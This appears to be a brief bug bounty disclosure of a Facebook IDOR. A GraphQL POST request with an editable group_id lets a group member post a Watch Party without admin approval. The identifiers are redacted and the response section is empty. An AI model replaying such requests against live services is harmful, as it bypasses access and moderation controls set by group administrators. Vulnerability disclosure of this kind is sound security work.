[Facebook] Bypass Admin approval for Watch Party
A group member was able to bypass post approvals and post a Watch Party.
POC -
A request going to the following GraphQL endpoint -
=====================================================================
=====================================================================
POST /graphql
HOST: facebook.com
av=XXX&__user=XXX&__a=1&variables={"input":{"client_mutation_id":"2","actor_id":"XXX","composer_session_id":"f22386d2e87fd5e","creator_actor_id":"XXX","custom_name":null,"group_id":"XXX","video_ids":["XXX"]}}&doc_id=1910407048979275
=====================================================================
=====================================================================
Where the "group_id" could be changed (IDOR).
The response would be -
=====================================================================
=====================================================================
=====================================================================
=====================================================================